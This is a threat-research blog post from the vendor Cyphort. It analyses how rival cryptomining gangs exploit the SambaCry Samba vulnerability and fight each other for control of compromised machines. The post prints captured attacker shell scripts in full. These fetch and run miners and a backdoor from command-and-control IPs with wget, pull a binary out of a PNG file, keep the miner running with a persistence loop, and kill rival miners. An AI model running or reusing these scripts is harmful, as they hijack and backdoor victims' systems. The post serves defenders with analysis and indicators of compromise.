Cyphort has been monitoring how threat actors are exploiting computing resources from compromised victims to mine various cryptocurrency. In our latest discovery, it seems these threat actors are aware of each others activities and are fighting a battle for control of compromised machines.

As we reported last week, the Samba vulnerability CVE-2017-7494 dubbed as SambaCry is getting exploited in the wild to compromise unpatched systems. Various threat actors are racing to gain ground by compromising as many vulnerable systems as possible to establish a foothold. And then, the most interesting things happen: some of them resort to closing the vulnerability behind them so no other threat can compromise that system again, which is a tactic we also reported on from actors exploiting EternalBlue. But more interestingly, they proceed to kill any existing cryptocurrency miner that could already be running on that system, and they do that by going after specific process names. This shows their intelligence gathering is pretty good.

Let us describe one such attack that Cyphort has detected.

Exploitation

The exploitation approach mimics what we described in a previous blog with one notable difference: the method used to launch the binary on the target machine is the SMB method “Create Request File” instead of the previously known “NT Create AndX Request” which many of the existing Snort rules are written to detect.

 

Cryptocurrency Miner Payload

Once the exploit executes, it proceeds to downloading payloads from the internet. In one case, we observed the download of a cryptocurrency miner as well as a backdoor. Here is the script downloading the miner:

#!/bin/sh
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

wget -q http://95.211.58.208/cpuminer -O /tmp/cpuminer
chmod +x /tmp/cpuminer
/tmp/cpuminer

In another case, we observed the download to occur as a PNG file cloaking a Linux binary and connecting to the crypto pool at 139.60.160.250.

Securing the foothold

The malware then proceeds to blackholing any traffic to a cryptocurrency mining server, probably a rival miner:

ip rule add blackhole to 212.129.44.155
ip rule add blackhole to 212.129.44.156
ip rule add blackhole to 212.129.44.157
ip rule add blackhole to 212.129.46.191
ip rule add blackhole to 212.129.46.87
ip rule add blackhole to 212.83.129.195
ip rule add blackhole to 212.83.168.39
ip rule add blackhole to 212.83.168.41
ip rule add blackhole to 62.210.29.108
route add 188.165.254.85 gw 127.0.0.1 lo
route add 94.23.8.105 gw 127.0.0.1 lo
route add 94.23.206.130 gw 127.0.0.1 lo
route add 188.165.214.76 gw 127.0.0.1 lo
route add 212.129.44.155 gw 127.0.0.1 lo
route add 212.129.44.156 gw 127.0.0.1 lo
route add 212.129.44.157 gw 127.0.0.1 lo
route add 212.129.46.191 gw 127.0.0.1 lo
route add 212.129.46.87 gw 127.0.0.1 lo
route add 212.83.129.195 gw 127.0.0.1 lo
route add 212.83.168.39 gw 127.0.0.1 lo
route add 212.83.168.41 gw 127.0.0.1 lo
route add 62.210.29.108 gw 127.0.0.1 lo

which are IPs for a known Monero crypto currency pool hosted in France.

It then proceeds to closing the Samba vulnerability by issuing the following commands:

echo "" >> /etc/samba/smb.conf
echo "nt pipe support = no" >> /etc/samba/smb.conf
echo "nt pipe support = no" >> /etc/smb.conf
service smb restart
service samba restart
/etc/init.d/smb restart

Which in effect makes this host safe from future attacks using this vulnerability. But the authors want to keep gaining access for themselves, so they install a backdoor:

cd /tmp
wget http://95.211.58.208/b -O b;chmod +x b;./b

And to make sure no other rival exploitation of this host is going on, the malware kills any process that would have started a .so file from the Samba share, which is where other attackers would have dropped their payloads.

ls -A1 /tmp/*.so | sed 's/\/tmp\///g' | awk '{print "killall "$1}' >>/tmp/out;sh /tmp/out;rm -rf /tmp/out

 Afterwards, it singles out a couple of rival miners which are usually installed as a processes called ‘m’ or ‘irqbalanc1’ and kills them:

m=`pidof m`
kill -9 $m
cd /tmp
killall irqbalanc1

In a different attack, the author was very specific in targeting known rival miners and killing their processes, first by killing any process that was started from the /tmp folder (which indicates Samba CVE exploited) and then going after known crypto currency miner process names. But this attacker did not close the vulnerability, so they had to keep checking if a rival currency miner invaded their host and if found, kills it.

#!/bin/sh
ps -ef|grep .sh|grep tmp|grep -v irq|grep -v grep|cut -c 9-15|xargs kill -9
pkill -f /tmp/m
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
pkill -f 45.76.146.166

ps auxf|grep -v grep|grep "irqbalanc1"|grep defunct|awk '{print $2}'|xargs kill -9
sleepTime=20
ps -fe|grep irqbalanc1 |grep -v defunct|grep -v grep
if [ $? -ne 0 ]
    then
    echo "start process....."
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
        then
        wget 91.235.143.149/miu1.png -O /tmp/conn
        dd if=/tmp/conn skip=7664 bs=1 of=/tmp/irqbalanc1
    else
        wget -O /tmp/irqbalanc1 http://91.235.143.149/kworker_na
    fi
    chmod +x /tmp/irqbalanc1
    wget -O /tmp/httpd.conf http://91.235.143.149/httpd2.conf
    nohup /tmp/irqbalanc1  -c /tmp/httpd.conf>/dev/null 2>&1 &
    sleep 5
    rm -rf /tmp/httpd.conf
    rm -rf /tmp/conn
    rm -rf /tmp/conns
    rm -f /tmp/irq.sh
    rm -f /tmp/irqbalanc1
    while [ 0 -lt 1 ]
    do
        ps -fe| grep irqbalanc1 |grep -v defunct| grep -v grep 
        if [ $? -ne 0 ]
            then
            echo "process not exists ,restart process now... "
            cat /proc/cpuinfo|grep aes>/dev/null
            if [ $? -ne 1 ]
                then
                wget 91.235.143.149/miu1.png -O /tmp/conn
                dd if=/tmp/conn skip=7664 bs=1 of=/tmp/irqbalanc1
            else
                wget -O /tmp/irqbalanc1 http://91.235.143.149/kworker_na
            fi
            chmod +x /tmp/irqbalanc1
            wget -O /tmp/httpd.conf http://91.235.143.149/httpd2.conf
            nohup /tmp/irqbalanc1  -c /tmp/httpd.conf>/dev/null 2>&1 &
            sleep 5
            rm -rf /tmp/httpd.conf
            rm -rf /tmp/conn
            rm -rf /tmp/conns
            rm -f /tmp/irq.sh
            rm -f /tmp/irqbalanc1
            echo "restart done ..... "
        else
            echo "process exists , sleep $sleepTime seconds "
            pkill -f JnKihGjn
            pkill -f irqba2anc1
            pkill -f irqba5xnc1
            pkill -f conns
            pkill -f irqbalance
            pkill -f crypto-pool
            pkill -f minexmr
            pkill -f XJnRj
            pkill -f NXLAi
            pkill -f BI5zj
            pkill -f askdljlqw
            pkill -f minerd
            pkill -f Guard.sh
            pkill -f ysaydh
            pkill -f bonns
            pkill -f donns
            pkill -f kxjd
            pkill -f 108.61.186.224
            pkill -f Duck.sh
            pkill -f bonn.sh
            pkill -f conn.sh
            pkill -f kworker34
            pkill -f pro.sh
            pkill -f polkitd
            pkill -f acpid
            ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
            pkill -f 45.76.146.166
        fi
        sleep $sleepTime
    done
else
    echo "runing....."

 Conclusion

It is interesting to observe the turf war between rival criminal gangs unfold in cyber space. Crypto currency mining is a heavy user of CPU power and some even resort to using GPUs when available. This made compute power a sought after commodity and each group is trying to protect their prized possessions.

If nothing else, this attack gives us a handy list of process names for currency miners that can be used to detect and clean host machines. Many thanks to Alex Burt from Cyphort Labs for his work on the research.

IOCs

exploit: 898f02ca922715109ada8f4718a6848bdcfcb209a99774302d01f6ed8fb13652

Miner: 26a717a7a14f10880a2869949814400b31d1f4c9cc45384be38289b012587468

Miner: d4ec78f0489509a7c8cc253d2d77e283e0f9b2abc657edac6c1595b3749a21ed

Miner: 28d5f75e289d652061c754079b23ec372da2e8feb1066a3d57381163b614c06c

Backdoor: 162de4e95e5e5d35d80ca4cf752c80b2b32b52c9e5fef5551caa20b0d5ed83af

CnC IPs:

91.235.143.149
95.211.58.208